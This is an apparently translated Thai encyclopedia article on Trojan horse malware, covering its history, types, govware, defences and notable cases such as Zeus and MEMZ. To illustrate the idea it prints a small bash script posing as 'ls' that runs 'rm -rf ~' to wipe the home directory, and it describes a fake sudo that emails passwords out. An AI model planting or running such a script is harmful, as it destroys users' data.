กลับไปหน้าบทความ

อ่าน 9 นาที

ไม่มีชื่อบทความ

ใน ด้านคอมพิวเตอร์ ม้า โทรจัน หรือ โทรจัน เป็น มัลแวร์ ชนิดหนึ่งที่หลอกลวงผู้ใช้เกี่ยวกับเจตนาที่แท้จริงโดยการปลอมตัวเป็นโปรแกรมปกติ โดยทั่วไปแล้วโทรจันจะแพร่กระจายโดยวิธี...

ม้าโทรจัน (ทางด้านคอมพิวเตอร์)

ในด้านคอมพิวเตอร์ม้าโทรจันหรือโทรจัน เป็น มัลแวร์ชนิดหนึ่งที่หลอกลวงผู้ใช้เกี่ยวกับเจตนาที่แท้จริงโดยการปลอมตัวเป็นโปรแกรมปกติ โดยทั่วไปแล้วโทรจันจะแพร่กระจายโดยวิธีการทางสังคมแม้ว่าเพย์โหลดของมันจะเป็นอะไรก็ได้ แต่โทรจันสมัยใหม่หลายรูปแบบทำหน้าที่เป็นแบ็กดอร์ติดต่อผู้ควบคุมซึ่งสามารถเข้าถึงอุปกรณ์ที่ได้รับผลกระทบโดยไม่ได้รับอนุญาตได้[ 1 ] การโจมตี แรนซัมแวร์มักดำเนินการโดยใช้โทรจัน ต่างจากไวรัสคอมพิวเตอร์และเวิร์มโทรจันโดยทั่วไปจะไม่พยายามแทรกตัวเองเข้าไปในไฟล์อื่นหรือแพร่กระจายตัวเองด้วยวิธีอื่น[ 2 ]ม้าโทรจันได้รับการตั้งชื่อตามม้าโทรจันในเทพนิยายกรีก[ 3 ]

ที่มาของคำนี้

คำนี้มาจาก เรื่องราว โบราณของกรีก เกี่ยวกับ ม้าโทรจันที่หลอกลวงซึ่งนำไปสู่การล่มสลายของเมืองทรอย [ 3 ] ไม่ชัดเจนว่าแนวคิดการคำนวณและคำนี้เกิดขึ้นที่ใดและเมื่อใด แต่ในปี 1971 คู่มือ Unix ฉบับแรก ถือว่าผู้อ่านรู้จักทั้งสองอย่าง[ 4 ]การอ้างอิงในยุคแรกอีกประการหนึ่งอยู่ใน รายงานของ กองทัพอากาศสหรัฐฯในปี 1974 เกี่ยวกับการวิเคราะห์ช่องโหว่ในระบบคอมพิวเตอร์Multics [ 5 ]

คำว่า "ม้าโทรจัน" ได้รับความนิยมจากKen Thompsonใน การบรรยายรับ รางวัล Turing Award ปี 1983 เรื่อง "Reflections on Trusting Trust" [ 6 ]ซึ่งมีชื่อรองว่า "เราควรเชื่อถือคำกล่าวที่ว่าโปรแกรมนั้นปราศจากม้าโทรจันมากน้อยเพียงใด? บางทีการเชื่อถือคนที่เขียนซอฟต์แวร์อาจสำคัญกว่า" เขากล่าวว่าเขารู้เกี่ยวกับการมีอยู่ของม้าโทรจันจากรายงานเกี่ยวกับความปลอดภัยของ Multics [ 7 ] [ 8 ]

การใช้ตัวพิมพ์ใหญ่

ศัพท์คอมพิวเตอร์ "Trojan horse" มาจากม้าโทรจันในตำนานของเมืองทรอย โบราณ ด้วยเหตุนี้ คำว่า "Trojan" จึงมักเขียนด้วยตัวพิมพ์ใหญ่ โดยเฉพาะในแหล่งข้อมูลเก่าๆ อย่างไรก็ตามคู่มือการเขียนและพจนานุกรมสมัยใหม่หลายเล่มแนะนำให้ใช้ตัวพิมพ์เล็กสำหรับคำว่า "trojan" ในการใช้งานทางเทคนิคนี้[ 9 ] [ 10 ]

พฤติกรรม

ภาพหน้าจอของMiniPanzer

เมื่อติดตั้งแล้ว โทรจันอาจดำเนินการต่างๆ ที่เป็นอันตรายได้มากมาย มักจะติดต่อ เซิร์ฟเวอร์ ควบคุมและสั่งการ (C2) อย่างน้อยหนึ่งเซิร์ฟเวอร์ผ่านทางอินเทอร์เน็ตและรอคำสั่ง เนื่องจากโทรจันแต่ละตัวมักใช้พอร์ตชุดเฉพาะสำหรับการสื่อสารนี้ จึงสามารถตรวจจับได้ค่อนข้างง่าย ยิ่งไปกว่านั้น มัลแวร์อื่นๆ อาจ "เข้าควบคุม" โทรจันได้ โดยใช้มันเป็นตัวแทนในการกระทำที่เป็นอันตราย[ 11 ]

ในประเทศที่ใช้ภาษาเยอรมันสปายแวร์ที่รัฐบาลใช้หรือสร้างขึ้นบางครั้งเรียกว่าโกฟแวร์ (govware ) โดยทั่วไปโกฟแวร์จะใช้เพื่อดักฟังการสื่อสารจากอุปกรณ์เป้าหมาย บางประเทศ เช่นสวิตเซอร์แลนด์และเยอรมนีมีกรอบกฎหมายที่ควบคุมการใช้ซอฟต์แวร์ดังกล่าว[ 12 ] [ 13 ]ตัวอย่างของโทรจันโกฟแวร์ ได้แก่MiniPanzer และ MegaPanzer ของสวิตเซอร์แลนด์ [ 14 ]และ"โทรจันของรัฐ" ของเยอรมนีที่มีชื่อเล่นว่า R2D2 [ 12 ] โกฟแวร์ของเยอรมนีทำงานโดยการใช้ประโยชน์จากช่องโหว่ด้านความปลอดภัยที่ไม่เป็นที่รู้จักของสาธารณชน และเข้าถึงข้อมูลสมาร์ทโฟนก่อนที่จะถูกเข้ารหัสผ่านแอปพลิเคชันอื่น[ 15 ]

เนื่องจากความนิยมของบอทเน็ตในหมู่แฮกเกอร์และความพร้อมใช้งานของบริการโฆษณาที่อนุญาตให้ผู้เขียนละเมิดความเป็นส่วนตัวของผู้ใช้ โทรจันจึงแพร่หลายมากขึ้น จากการสำรวจที่ดำเนินการโดยBitDefenderตั้งแต่เดือนมกราคมถึงมิถุนายน 2552 พบว่า "มัลแวร์ประเภทโทรจันกำลังเพิ่มขึ้น คิดเป็น 83% ของมัลแวร์ที่ตรวจพบทั่วโลก" [ 16 ] BitDefender ระบุว่าประมาณ 15% ของคอมพิวเตอร์เป็นสมาชิกของบอทเน็ตซึ่งมักจะถูกชักชวนโดยการติดเชื้อโทรจัน[ 17 ]

การตรวจสอบล่าสุดได้เปิดเผยว่ามีการใช้วิธีการโทรจันเป็นวิธีการโจมตี ระบบ คลาวด์คอมพิวติ้ง การโจมตีแบบโทรจันบนระบบคลาวด์พยายามแทรกแอปพลิเคชันหรือบริการเข้าไปในระบบ ซึ่งอาจส่งผลกระทบต่อบริการคลาวด์โดยการเปลี่ยนแปลงหรือหยุดการทำงาน เมื่อระบบคลาวด์ระบุว่าการโจมตีนั้นถูกต้อง บริการหรือแอปพลิเคชันจะถูกเรียกใช้งาน ซึ่งอาจสร้างความเสียหายและทำให้ระบบคลาวด์ติดไวรัสได้[ 18 ]

การจำแนกประเภทของม้าโทรจัน

โดยทั่วไปแล้วโทรจันจะถูกจัดประเภทตามหน้าที่หลักหรือผลกระทบที่ตั้งใจไว้ ประเภทหลักประเภทหนึ่งคือโทรจันธนาคารซึ่งออกแบบมาเพื่อขโมยข้อมูลทางการเงิน เช่น ข้อมูลประจำตัวการธนาคารออนไลน์หมายเลขบัตรเครดิตหรือรหัสกระเป๋าเงินคริปโตเคอร์เรนซี[ 19 ] Zeus และ TrickBot เป็นตัวอย่างที่ได้รับการศึกษามากที่สุดในประเภทนี้ อีกประเภทหนึ่งคือโทรจันการเข้าถึงระยะไกล ( RAT ) ซึ่งช่วยให้ผู้โจมตีสามารถควบคุมระบบที่ติดเชื้อได้อย่างสมบูรณ์ ทำให้พวกเขาสามารถติดตั้งซอฟต์แวร์เพิ่มเติม เข้าถึงไฟล์ หรือตรวจสอบกิจกรรมของผู้ใช้ได้[ 20 ]

โทรจันบางตัวเป็นโปรแกรมดาวน์โหลด เป็นหลัก ซึ่งหมายความว่าพวกมันทำหน้าที่เป็นขั้นตอนการติดเชื้อเริ่มต้นโดยการติดตั้งมัลแวร์รูปแบบอื่นเมื่อเข้าไปในระบบแล้ว สิ่งเหล่านี้มักปูทางไปสู่แรนซัมแวร์สปายแวร์หรือการสรรหาบอทเน็ต[ 21 ]โทรจันที่ขโมยข้อมูลก็พบได้ทั่วไปเช่นกัน โดยจะรวบรวมข้อมูลที่ละเอียดอ่อน เช่นคุกกี้ของเบราว์เซอร์ข้อมูลประจำตัวที่จัดเก็บไว้ หรือเอกสารโดยที่ผู้ใช้ไม่รู้ตัว นอกจากนี้โทรจันแอนติไวรัสปลอมยังเลียนแบบซอฟต์แวร์รักษาความปลอดภัยที่ถูกต้องตามกฎหมาย หลอกลวงผู้ใช้ให้จ่ายเงินสำหรับบริการที่ไม่จำเป็นหรือเป็นอันตราย[ 22 ]เนื่องจากโทรจันสามารถปรับตัวเพื่อวัตถุประสงค์ได้หลายอย่าง โทรจันสมัยใหม่หลายประเภทจึงมีคุณสมบัติที่ทับซ้อนกัน โดยผสมผสานองค์ประกอบของแบ็กดอร์สปายแวร์ และโปรแกรมดาวน์โหลด[ 22 ]ความสามารถในการปรับตัวนี้เป็นปัจจัยสำคัญที่ทำให้โทรจันแพร่หลายและเป็นหนึ่งในรูปแบบของมัลแวร์ที่พบได้บ่อยที่สุด

ตัวอย่างคำสั่ง ls ใน Linux

ม้าโทรจันคือโปรแกรมที่อ้างว่าทำหน้าที่ที่ถูกต้องตามกฎหมาย แต่เมื่อเรียกใช้งานแล้วกลับทำให้ความปลอดภัยของผู้ใช้ลดลง[ 23 ]ตัวอย่างง่ายๆ[ 24 ] คือคำสั่ง lsของ Linux เวอร์ชันที่เป็นอันตรายดังต่อไปนี้ผู้โจมตีจะวางสคริปต์ที่เรียกใช้งานได้นี้ไว้ในตำแหน่งที่สามารถเขียนได้โดยสาธารณะและ "มีการรับส่งข้อมูลสูง" (เช่น/tmp/ls) จากนั้น เหยื่อใดๆ ที่พยายามเรียกใช้lsจากไดเร็กทอรีนั้น — หากและเฉพาะในกรณีที่การค้นหาไฟล์ที่เรียกใช้งานได้ของเหยื่อPATHไม่รอบคอบ[ 24 ]รวมถึงไดเร็กทอรีปัจจุบัน.— จะเรียกใช้/tmp/lsแทน/usr/bin/lsและไดเร็กทอรีบ้านของพวกเขาจะถูกลบ

#!/usr/bin/env bash rm -rf ~ 2 >/dev/null # ลบไดเร็กทอรีโฮมของผู้ใช้ จากนั้นลบตัวเอง rm $0

สคริปต์ที่คล้ายกันอาจเข้าควบคุมคำสั่งทั่วไปอื่นๆ ได้ ตัวอย่างเช่น สคริปต์ที่แสร้งทำเป็น คำสั่ง sudo (ซึ่งจะขอรหัสผ่านจากผู้ใช้) อาจส่งรหัสผ่านนั้นไปยังผู้โจมตีทางอีเมลแทน[ 23 ]ในตัวอย่างเหล่านี้ โปรแกรมที่เป็นอันตรายจะเลียนแบบชื่อของโปรแกรมที่มีประโยชน์ที่รู้จักกันดี แทนที่จะแสร้งทำเป็นโปรแกรมใหม่และไม่คุ้นเคย (แต่ไม่เป็นอันตราย) ดังนั้น ตัวอย่างเหล่านี้จึงคล้ายกับ การโจมตี แบบ typosquattingและการโจมตีแบบ supply chain

การป้องกันและการบรรเทาผลกระทบ

การป้องกันการติดไวรัสโทรจันต้องอาศัยการผสมผสานระหว่างความตระหนักรู้ของผู้ใช้ มาตรการป้องกันทางเทคนิค และแนวทางการรักษาความปลอดภัยเชิงรุก การให้ความรู้แก่ผู้ใช้เกี่ยวกับอันตรายของการดาวน์โหลดไฟล์ที่ไม่ได้รับการตรวจสอบหรือการเรียกใช้โปรแกรมที่ไม่รู้จักยังคงเป็นวิธีที่มีประสิทธิภาพในการป้องกันการโจมตี[ 25 ]ซอฟต์แวร์รักษาความปลอดภัย เช่น โปรแกรมป้องกันไวรัสและโปรแกรมป้องกันมัลแวร์สามารถช่วยตรวจจับ กักกัน และกำจัดไวรัสโทรจันได้เมื่อได้รับการอัปเดตอย่างสม่ำเสมอ[ 26 ]แนวทางการท่องเว็บอย่างปลอดภัย เช่น การหลีกเลี่ยงลิงก์ที่น่าสงสัย การงดเว้นการดาวน์โหลดซอฟต์แวร์จากแหล่งที่ไม่น่าเชื่อถือ และการใช้ความระมัดระวังกับไฟล์แนบในอีเมล ก็เป็นกุญแจสำคัญในการลดความเสี่ยงเช่นกัน[ 27 ]นอกจากนี้ การอัปเดตซอฟต์แวร์และระบบปฏิบัติการอย่างสม่ำเสมอจะช่วยให้มั่นใจได้ว่าช่องโหว่ที่ทราบจะได้รับการแก้ไข ทำให้ไวรัสโทรจันใช้ประโยชน์จากจุดอ่อนได้ยากขึ้น[ 28 ]ในสภาพแวดล้อมระดับมืออาชีพ ไฟร์วอลล์เครือข่าย ระบบตรวจจับการบุกรุก (IDS) และเครื่องมือกรองอีเมล มักใช้เพื่อบล็อกการรับส่งข้อมูลที่น่าสงสัยและป้องกันไม่ให้ไวรัสโทรจันสื่อสารกับเซิร์ฟเวอร์ภายนอก การตรวจสอบความปลอดภัยเป็นประจำ โปรแกรมฝึกอบรมพนักงาน และการสำรองข้อมูลเป็นประจำจะช่วยเสริมสร้างการป้องกันและช่วยลดความเสียหายที่อาจเกิดขึ้นในกรณีที่มีการติดเชื้อ[ 29 ]

การพัฒนาและเทคนิคการตรวจจับที่ทันสมัย

ม้าโทรจันสมัยใหม่ได้เปลี่ยนแปลงไปจากมัลแวร์แบบไฟล์ดั้งเดิม โดยใช้เทคนิคที่ออกแบบมาเพื่อหลีกเลี่ยงเครื่องมือรักษาความปลอดภัยแบบใช้ลายเซ็น ตัวอย่างของแนวทางนี้คือมัลแวร์แบบไร้ไฟล์ ซึ่งโทรจันจะทำงานส่วนใหญ่ในหน่วยความจำระบบและอาศัยเครื่องมือการจัดการที่ถูกต้องตามกฎหมาย เช่นPowerShellหรือWindows Management Instrumentation (WMI) ด้วยการลดหรือลบไฟล์ที่เป็นอันตรายบนดิสก์ ทำให้โทรจันแบบไร้ไฟล์ตรวจจับได้ยากขึ้นสำหรับซอฟต์แวร์ป้องกันไวรัสทั่วไป[ 30 ] ในช่วงไม่กี่ปีที่ผ่านมา โทรจันได้ขยายไปยังแพลตฟอร์มมือถือและฝังตัว โทรจัน Android มักถูกเผยแพร่ผ่านร้านค้าแอปพลิเคชันที่ไม่เป็นทางการหรือแคมเปญฟิชชิ่ง และอาจขอสิทธิ์เพิ่มเติมที่อนุญาตให้เข้าถึงข้อความ ข้อมูลประจำตัวที่จัดเก็บ หรือข้อมูลทางการเงิน[ 31 ]โทรจันที่กำหนดเป้าหมายอุปกรณ์ Internet of Things (IoT) มักใช้ประโยชน์จากแนวทางการตรวจสอบสิทธิ์ที่อ่อนแอหรือเฟิร์มแวร์ที่ไม่ได้แก้ไข ซึ่งจะทำให้อุปกรณ์ที่ถูกบุกรุกสามารถรวมเข้ากับบอทเน็ตขนาดใหญ่ที่ใช้สำหรับการโจมตีแบบปฏิเสธการให้บริการแบบกระจาย (DDoS) [ 32 ] เพื่อรับมือกับการพัฒนาเหล่านี้ ระบบรักษาความปลอดภัยสมัยใหม่จึงพึ่งพาเทคนิคการตรวจจับตามพฤติกรรมมากขึ้นเรื่อยๆ แทนที่จะพึ่งพาเฉพาะลายเซ็นมัลแวร์ที่รู้จัก การวิเคราะห์พฤติกรรมจะตรวจสอบกิจกรรมของระบบเพื่อหาสัญญาณต่างๆ เช่น การยกระดับสิทธิ์โดยไม่ได้รับอนุญาต หรือรูปแบบการสื่อสารเครือข่ายที่น่าสงสัย[ 33 ]นอกเหนือจากการตรวจจับตามพฤติกรรมแล้ว ยังมีการพัฒนาวิธีการที่ใช้การเรียนรู้ของเครื่องเพื่อจำแนกและตรวจจับโทรจันโดยการระบุความผิดปกติภายในข้อมูลการวัดระยะไกลของระบบและเครือข่ายขนาดใหญ่ แม้ว่าวิธีการเหล่านี้จะช่วยเพิ่มอัตราการตรวจจับได้ แต่ก็ยังมีความท้าทายที่เกี่ยวข้องกับผลบวกเท็จและความชัดเจนของระบบการตัดสินใจอัตโนมัติ[ 34 ]

ตัวอย่างที่น่าสนใจ

มีโทรจันที่มีชื่อเสียงหลายตัวที่มีบทบาทสำคัญในประวัติศาสตร์ของความปลอดภัยทางไซเบอร์ ตัวอย่างแรกคือโทรจัน AIDSซึ่งพัฒนาขึ้นในปี 1989 ถือเป็นหนึ่งในรูปแบบแรก ๆ ของแรนซัมแวร์ เนื่องจากมันเข้ารหัสชื่อไฟล์บนคอมพิวเตอร์ที่ติดเชื้อและเรียกร้องเงินเพื่อกู้คืน[ 35 ]

ตัวอย่างที่มีชื่อเสียงคือโทรจันYou Are An Idiot ซึ่งพัฒนาขึ้นในปี 2002 โดยมีต้นกำเนิดมาจากสเก็ตช์ตลกของริค ดีส์ นักจัดรายการวิทยุชาวอเมริกัน ในอัลบั้มPut It Where the Moon Don't Shine ปี 1984 โดยเฉพาะอย่างยิ่ง เสียงร้องประกอบถูกนำมาใช้ในช่วงการโทรแกล้งเล่นชื่อ "Candid Phone: Dog Funeral" เสียงนี้ได้รับความนิยมอย่างมากในช่วงต้นทศวรรษ 2000 เมื่อถูกนำไปใช้เป็นตัวอย่างในเว็บไซต์ YouAreAnIdiot.org ซึ่งทำหน้าที่เป็นโทรจันที่ทำงานบนเบราว์เซอร์ เว็บไซต์นี้ทำให้ผู้ใช้รู้สึกรำคาญด้วยการแสดงใบหน้ายิ้มขาวดำที่กระพริบไปมาในขณะที่เล่นเสียงร้องซ้ำๆ อย่างต่อเนื่อง มันกลายเป็น "ระเบิดป๊อปอัพ" ในตำนาน เพราะมันจะสร้างหน้าต่างใหม่หกบานทุกครั้งที่ผู้ใช้พยายามปิดหน้าต่างหนึ่ง และปิดใช้งานปุ่มลัดมาตรฐาน เช่น Alt+F4 แม้ว่าจะไม่ทำให้ไฟล์เสียหายอย่างถาวร แต่มันก็มักจะใช้ทรัพยากรระบบจนหมดและทำให้คอมพิวเตอร์ค้าง เวอร์ชันที่ปลอดภัยของเว็บไซต์ถูกสร้างขึ้นในภายหลังโดยไม่มีคุณสมบัติการสร้างหน้าต่างใหม่[ 36 ]

ตัวอย่างที่มีชื่อเสียงอีกตัวอย่างหนึ่งคือโทรจัน Zeusซึ่งถูกระบุครั้งแรกในปี 2550 Zeus มุ่งเป้าไปที่ระบบ Microsoft Windows เป็นหลัก และได้รับการออกแบบมาเพื่อขโมยข้อมูลประจำตัวทางการธนาคารผ่าน การโจมตี แบบ man-in-the-browserซึ่งจะติดเชื้อเบราว์เซอร์ของผู้ใช้เพื่อดักจับและจัดการข้อมูล ส่งผลให้เกิดความสูญเสียทางการเงินและการรั่วไหลของข้อมูลอย่างกว้างขวาง[ 37 ]ในปี 2558 ในประเทศยูเครน กลุ่มผู้โจมตีได้ใช้คอมพิวเตอร์ที่ได้รับการรับรองความถูกต้องซึ่งถูกควบคุมจากระยะไกลโดยใช้โทรจันการเข้าถึงระยะไกลเพื่อเข้าถึงเซิร์ฟเวอร์ควบคุม ส่งผลให้ไฟฟ้าดับสำหรับประชาชน 80,000 คน[ 38 ] [ 39 ]ในปี 2559 โทรจัน MEMZซึ่งเป็นโปรแกรมบน Windows ได้รับการยอมรับอย่างกว้างขวางสำหรับเพย์โหลดที่ซับซ้อนและทำลายล้าง MEMZ มีชื่อเสียงในด้านการแสดงเอฟเฟกต์ภาพที่ผิดปกติบนเครื่องที่ติดเชื้อ และในที่สุดก็ทำให้ระบบใช้งานไม่ได้

แผนที่แสดงประเทศที่ได้รับผลกระทบจาก ANOM

ภาคเอกชนและภาครัฐ

เปิดให้สาธารณะเข้าถึงได้

ตรวจพบโดยนักวิจัยด้านความปลอดภัย

ดูเพิ่มเติม

  • โลโก้ Wikimedia Commonsสื่อที่เกี่ยวข้องกับม้าโทรจัน (มัลแวร์) ในวิกิมีเดียคอมมอนส์
  • "เอกสารคำแนะนำของ CERT CA-1999-02 เรื่องม้าโทรจัน" (PDF)สถาบันวิศวกรรมซอฟต์แวร์ มหาวิทยาลัยคาร์เนกีเมลลอนเก็บถาวรจากต้นฉบับเมื่อวันที่ 17 ตุลาคม 2000 เรียกดูเมื่อวันที่ 15 กันยายน 2019

สรุปเนื้อหา

ข้อมูลสำคัญจากบทความ

ข้อมูลสำคัญเกี่ยวกับ ไม่มีชื่อบทความ

ใน ด้านคอมพิวเตอร์ ม้า โทรจัน หรือ โทรจัน เป็น มัลแวร์ ชนิดหนึ่งที่หลอกลวงผู้ใช้เกี่ยวกับเจตนาที่แท้จริงโดยการปลอมตัวเป็นโปรแกรมปกติ โดยทั่วไปแล้วโทรจันจะแพร่กระจายโดยวิธี...

ที่มาของคำนี้

คำนี้มาจาก เรื่องราว โบราณของกรีก เกี่ยวกับ ม้าโทรจัน ที่หลอกลวงซึ่งนำไปสู่การล่มสลายของเมือง ทรอย [ 3 ] ไม่ ชัดเจนว่าแนวคิดการคำนวณและคำนี้เกิดขึ้นที่ใดและเมื่อใด แต่ในปี 1971 คู่มือ Unix ฉบับแรก ถือว่าผู้อ่านรู้จักทั้งสองอย่าง [ 4 ]...

การใช้ตัวพิมพ์ใหญ่

ศัพท์คอมพิวเตอร์ "Trojan horse" มาจากม้าโทรจันในตำนานของเมือง ทรอย โบราณ ด้วยเหตุนี้ คำว่า "Trojan" จึงมักเขียนด้วยตัวพิมพ์ใหญ่ โดยเฉพาะในแหล่งข้อมูลเก่าๆ อย่างไรก็ตาม คู่มือการเขียน และพจนานุกรมสมัยใหม่หลายเล่มแนะนำให้ใช้ตัวพิมพ์เล็กสำหรับคำว่า "trojan"...

พฤติกรรม

เมื่อติดตั้งแล้ว โทรจันอาจดำเนินการต่างๆ ที่เป็นอันตรายได้มากมาย มักจะติดต่อ เซิร์ฟเวอร์ ควบคุมและสั่งการ (C2) อย่างน้อยหนึ่งเซิร์ฟเวอร์ผ่านทางอินเทอร์เน็ตและรอคำสั่ง เนื่องจากโทรจันแต่ละตัวมักใช้พอร์ตชุดเฉพาะสำหรับการสื่อสารนี้...